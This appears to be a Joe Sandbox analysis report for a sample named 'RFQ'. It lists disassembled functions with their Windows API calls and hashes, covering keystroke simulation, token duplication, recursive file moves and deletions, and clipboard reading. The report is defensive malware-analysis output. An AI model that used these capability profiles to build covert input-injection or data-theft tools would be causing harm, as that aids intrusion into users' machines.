                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID: %d/%02d/%02d
                                                                                                                                                    • API String ID: 3850602802-328681919
                                                                                                                                                    • Opcode ID: 0df089ab0bcb443056476164b9a6aea28ab3d9e2d03e037eb96026a2017ee3ce
                                                                                                                                                    • Instruction ID: 56058533dd252281ff935aaeab744771cc8fa20b2721a9d72f3b087511fdb157
                                                                                                                                                    • Opcode Fuzzy Hash: 0df089ab0bcb443056476164b9a6aea28ab3d9e2d03e037eb96026a2017ee3ce
                                                                                                                                                    • Instruction Fuzzy Hash: 3212B071500208ABEF259F68ED49FAE7BB8FF85710F108229F915DB2D1DB788941CB51
                                                                                                                                                    Function 0074EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetForegroundWindow.USER32(00000000,00000000), ref: 0074EB4A
                                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007A3AEA
                                                                                                                                                    • IsIconic.USER32(000000FF), ref: 007A3AF3
                                                                                                                                                    • ShowWindow.USER32(000000FF,00000009), ref: 007A3B00
                                                                                                                                                    • SetForegroundWindow.USER32(000000FF), ref: 007A3B0A
                                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007A3B20
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 007A3B27
                                                                                                                                                    • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 007A3B33
                                                                                                                                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 007A3B44
                                                                                                                                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 007A3B4C
                                                                                                                                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 007A3B54
                                                                                                                                                    • SetForegroundWindow.USER32(000000FF), ref: 007A3B57
                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 007A3B6C
                                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 007A3B77
                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 007A3B81
                                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 007A3B86
                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 007A3B8F
                                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 007A3B94
                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 007A3B9E
                                                                                                                                                    • keybd_event.USER32(00000012,00000000), ref: 007A3BA3
                                                                                                                                                    • SetForegroundWindow.USER32(000000FF), ref: 007A3BA6
                                                                                                                                                    • AttachThreadInput.USER32(000000FF,?,00000000), ref: 007A3BCD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                                    • API String ID: 4125248594-2988720461
                                                                                                                                                    • Opcode ID: 59c13e7aced595ac7f9160fe2e774cf828d2e749c1a15394aeca465d0ff27f73
                                                                                                                                                    • Instruction ID: c6dec4dc75a88dc2680e0ab3ae480f17cf0da9ad531ea9377da8db182bd07452
                                                                                                                                                    • Opcode Fuzzy Hash: 59c13e7aced595ac7f9160fe2e774cf828d2e749c1a15394aeca465d0ff27f73
                                                                                                                                                    • Instruction Fuzzy Hash: AB3196B1A40318BBEB305F659C49F7F7E6CEF84B50F108125FA05EA1D0E6B85D109AB4
                                                                                                                                                    Function 0076ACC5 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 223COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0076B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0076B180
                                                                                                                                                      • Part of subcall function 0076B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0076B1AD
                                                                                                                                                      • Part of subcall function 0076B134: GetLastError.KERNEL32 ref: 0076B1BA
                                                                                                                                                    • _memset.LIBCMT ref: 0076AD08
                                                                                                                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0076AD5A
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0076AD6B
                                                                                                                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0076AD82
                                                                                                                                                    • GetProcessWindowStation.USER32 ref: 0076AD9B
                                                                                                                                                    • SetProcessWindowStation.USER32(00000000), ref: 0076ADA5
                                                                                                                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0076ADBF
                                                                                                                                                      • Part of subcall function 0076AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0076ACC0), ref: 0076AB99
                                                                                                                                                      • Part of subcall function 0076AB84: CloseHandle.KERNEL32(?,?,0076ACC0), ref: 0076ABAB
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                                                                                                    • String ID: $H*~$default$winsta0
                                                                                                                                                    • API String ID: 2063423040-1985088185
                                                                                                                                                    • Opcode ID: 68edb1114b59e7765f6c1765a9f0b16855924f9a5cf16851a2872a80177e8fe9
                                                                                                                                                    • Instruction ID: f5921f6ea662c2c0b3e7c9acd7c6bc0a721411be5fd1dca0bb64b6828ace4bd1
                                                                                                                                                    • Opcode Fuzzy Hash: 68edb1114b59e7765f6c1765a9f0b16855924f9a5cf16851a2872a80177e8fe9
                                                                                                                                                    • Instruction Fuzzy Hash: 0F815AB1900209BFDF119FA4CC49AEE7B79EF08304F048159FC16B2161EB7A8E559F62
                                                                                                                                                    Function 007760DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00776EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00775FA6,?), ref: 00776ED8
                                                                                                                                                      • Part of subcall function 00776EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00775FA6,?), ref: 00776EF1
                                                                                                                                                      • Part of subcall function 0077725E: __wsplitpath.LIBCMT ref: 0077727B
                                                                                                                                                      • Part of subcall function 0077725E: __wsplitpath.LIBCMT ref: 0077728E
                                                                                                                                                      • Part of subcall function 007772CB: GetFileAttributesW.KERNEL32(?,00776019), ref: 007772CC
                                                                                                                                                    • _wcscat.LIBCMT ref: 00776149
                                                                                                                                                    • _wcscat.LIBCMT ref: 00776167
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 0077618E
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 007761A4
                                                                                                                                                    • _wcscpy.LIBCMT ref: 00776209
                                                                                                                                                    • _wcscat.LIBCMT ref: 0077621C
                                                                                                                                                    • _wcscat.LIBCMT ref: 0077622F
                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0077625D
                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0077626E
                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00776289
                                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00776298
                                                                                                                                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 007762AD
                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 007762BE
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 007762E1
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 007762FD
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0077630B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                                                                                                    • String ID: \*.*
                                                                                                                                                    • API String ID: 1917200108-1173974218
                                                                                                                                                    • Opcode ID: 08d212ddbe037b79da6ca524035f8c3f714c5df2f67d39e5ffaa3968a177ed93
                                                                                                                                                    • Instruction ID: 3a0bc0aa9afe7eb05cfbdcf26b4db52e8c4f63bae9ab2e73cc04f4d223f963ed
                                                                                                                                                    • Opcode Fuzzy Hash: 08d212ddbe037b79da6ca524035f8c3f714c5df2f67d39e5ffaa3968a177ed93
                                                                                                                                                    • Instruction Fuzzy Hash: B151117290811C9ACF21EB51CC48EDB77BCBB05340F0541E6E549E3146EA7A9B498FA4
                                                                                                                                                    Function 00786B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • OpenClipboard.USER32(007CDC00), ref: 00786B36
                                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00786B44
                                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 00786B4C
                                                                                                                                                    • CloseClipboard.USER32 ref: 00786B58
                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00786B74
                                                                                                                                                    • CloseClipboard.USER32 ref: 00786B7E
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00786B93
                                                                                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00786BA0
                                                                                                                                                    • GetClipboardData.USER32(00000001), ref: 00786BA8
                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00786BB5
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00786BE9
                                                                                                                                                    • CloseClipboard.USER32 ref: 00786CF6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3222323430-0
                                                                                                                                                    • Opcode ID: 40dbabd8428d3cdc31509eb096fd6164ff3d12c3398457ad9f7eee38d0e387d2
                                                                                                                                                    • Instruction ID: 4b260d778475298dc4d5e510533e7e98df4799bcedb7946fd46b07c19010fdb5
                                                                                                                                                    • Opcode Fuzzy Hash: 40dbabd8428d3cdc31509eb096fd6164ff3d12c3398457ad9f7eee38d0e387d2
                                                                                                                                                    • Instruction Fuzzy Hash: 2151BF71240201ABE321BF64DC9AF6E77A8AF88B44F108129F546D61D1EF78ED058B66
                                                                                                                                                    Function 0077F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0077F62B
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0077F67F
                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0077F6A4
                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0077F6BB
                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0077F6E2
                                                                                                                                                    • __swprintf.LIBCMT ref: 0077F72E
                                                                                                                                                    • __swprintf.LIBCMT ref: 0077F767
                                                                                                                                                    • __swprintf.LIBCMT ref: 0077F7BB
                                                                                                                                                      • Part of subcall function 0075172B: __woutput_l.LIBCMT ref: 00751784
                                                                                                                                                    • __swprintf.LIBCMT ref: 0077F809
                                                                                                                                                    • __swprintf.LIBCMT ref: 0077F858
                                                                                                                                                    • __swprintf.LIBCMT ref: 0077F8A7
                                                                                                                                                    • __swprintf.LIBCMT ref: 0077F8F6
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                                                                                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                    • API String ID: 835046349-2428617273
                                                                                                                                                    • Opcode ID: bc0c099d008a8e08b8e71c4973353f3a45acecad4b3233f1965843b9dd4f7c7a
                                                                                                                                                    • Instruction ID: b6334ae0995c3faac7b4acfa3047946f78356b3d09f8e82050fc0599047aac13
                                                                                                                                                    • Opcode Fuzzy Hash: bc0c099d008a8e08b8e71c4973353f3a45acecad4b3233f1965843b9dd4f7c7a
                                                                                                                                                    • Instruction Fuzzy Hash: EBA12EB2408344EBD315EB94C889DAFB7ECBF98700F40492DF595D2152EB39E949CB62
                                                                                                                                                    Function 00781B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00781B50
                                                                                                                                                    • _wcscmp.LIBCMT ref: 00781B65
                                                                                                                                                    • _wcscmp.LIBCMT ref: 00781B7C
                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00781B8E
                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00781BA8
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00781BC0
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00781BCB
                                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00781BE7
                                                                                                                                                    • _wcscmp.LIBCMT ref: 00781C0E
                                                                                                                                                    • _wcscmp.LIBCMT ref: 00781C25
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00781C37
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(007E39FC), ref: 00781C55
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00781C5F
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00781C6C
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00781C7C
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                    • String ID: *.*
                                                                                                                                                    • API String ID: 1803514871-438819550
                                                                                                                                                    • Opcode ID: 5694f8d9a87dbe6fc4abfa4a6bca8edf989be28d298b29f927ce70da352d359b
                                                                                                                                                    • Instruction ID: 48fe516bd21972a5f85dc59f32225f4fcc785f77ccd67eb75a0d59b544230e93
                                                                                                                                                    • Opcode Fuzzy Hash: 5694f8d9a87dbe6fc4abfa4a6bca8edf989be28d298b29f927ce70da352d359b
                                                                                                                                                    • Instruction Fuzzy Hash: E231D671541219ABCF20ABA4DC49FEE77ACAF05320F5042A5E911E3090EB78DE468B64
                                                                                                                                                    Function 00781C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00781CAB
                                                                                                                                                    • _wcscmp.LIBCMT ref: 00781CC0
                                                                                                                                                    • _wcscmp.LIBCMT ref: 00781CD7
                                                                                                                                                      • Part of subcall function 00776BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00776BEF
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00781D06
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00781D11
                                                                                                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00781D2D
                                                                                                                                                    • _wcscmp.LIBCMT ref: 00781D54
                                                                                                                                                    • _wcscmp.LIBCMT ref: 00781D6B
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00781D7D
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(007E39FC), ref: 00781D9B
                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00781DA5
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00781DB2
                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00781DC2
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                    • String ID: *.*
                                                                                                                                                    • API String ID: 1824444939-438819550
                                                                                                                                                    • Opcode ID: 2053cf63109c29fe5f24807795717a4d4559347831a63ca46628a22504203d88
                                                                                                                                                    • Instruction ID: 13af4478d383359648efb57af0263b506f7e9239029c03866109e59a74d05e1e
                                                                                                                                                    • Opcode Fuzzy Hash: 2053cf63109c29fe5f24807795717a4d4559347831a63ca46628a22504203d88
                                                                                                                                                    • Instruction Fuzzy Hash: 3E31E53164061EBACF20BBA4DC49FEE77AC9F05324F504695E901A3191EB78DE468B64
                                                                                                                                                    Function 00737D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset
                                                                                                                                                    • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                                                                                                                    • API String ID: 2102423945-2023335898
                                                                                                                                                    • Opcode ID: 3a3012ddc4fd964c4cb589f297da467bb5b9687a99ef86ba224863f19b995fa2
                                                                                                                                                    • Instruction ID: 555cecc6a68f25bf5b3c2010027cd3b0b2420faa0efb4d9173e6f97854f2b568
                                                                                                                                                    • Opcode Fuzzy Hash: 3a3012ddc4fd964c4cb589f297da467bb5b9687a99ef86ba224863f19b995fa2
                                                                                                                                                    • Instruction Fuzzy Hash: 6782A3B1D04219DBDF28CF98C8807EDB7B1BF89310F258269D855AB352E7789D85CB90
                                                                                                                                                    Function 0078091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 007809DF
                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 007809EF
                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007809FB
                                                                                                                                                    • __wsplitpath.LIBCMT ref: 00780A59
                                                                                                                                                    • _wcscat.LIBCMT ref: 00780A71
                                                                                                                                                    • _wcscat.LIBCMT ref: 00780A83
                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00780A98
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00780AAC
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00780ADE
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00780AFF
                                                                                                                                                    • _wcscpy.LIBCMT ref: 00780B0B
                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00780B4A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                                                                                    • String ID: *.*
                                                                                                                                                    • API String ID: 3566783562-438819550
                                                                                                                                                    • Opcode ID: 1f37e6e21b7d25a1d9a5f1fc054a925a038d6c73068e81962f36efb0bf8bf6e8
                                                                                                                                                    • Instruction ID: 9110bc68ea5e687f2b9737642c75194cca280ad0c7c07b690a5fd95918bc6e5f
                                                                                                                                                    • Opcode Fuzzy Hash: 1f37e6e21b7d25a1d9a5f1fc054a925a038d6c73068e81962f36efb0bf8bf6e8
                                                                                                                                                    • Instruction Fuzzy Hash: F2614EB25043059FD710EF60C88999EB3E8FF89314F04895DF989C7252EB39E949CB92
                                                                                                                                                    Function 0076A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0076ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0076ABD7
                                                                                                                                                      • Part of subcall function 0076ABBB: GetLastError.KERNEL32(?,0076A69F,?,?,?), ref: 0076ABE1
                                                                                                                                                      • Part of subcall function 0076ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0076A69F,?,?,?), ref: 0076ABF0
                                                                                                                                                      • Part of subcall function 0076ABBB: HeapAlloc.KERNEL32(00000000,?,0076A69F,?,?,?), ref: 0076ABF7
                                                                                                                                                      • Part of subcall function 0076ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0076AC0E
                                                                                                                                                      • Part of subcall function 0076AC56: GetProcessHeap.KERNEL32(00000008,0076A6B5,00000000,00000000,?,0076A6B5,?), ref: 0076AC62
                                                                                                                                                      • Part of subcall function 0076AC56: HeapAlloc.KERNEL32(00000000,?,0076A6B5,?), ref: 0076AC69
                                                                                                                                                      • Part of subcall function 0076AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0076A6B5,?), ref: 0076AC7A
                                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0076A6D0
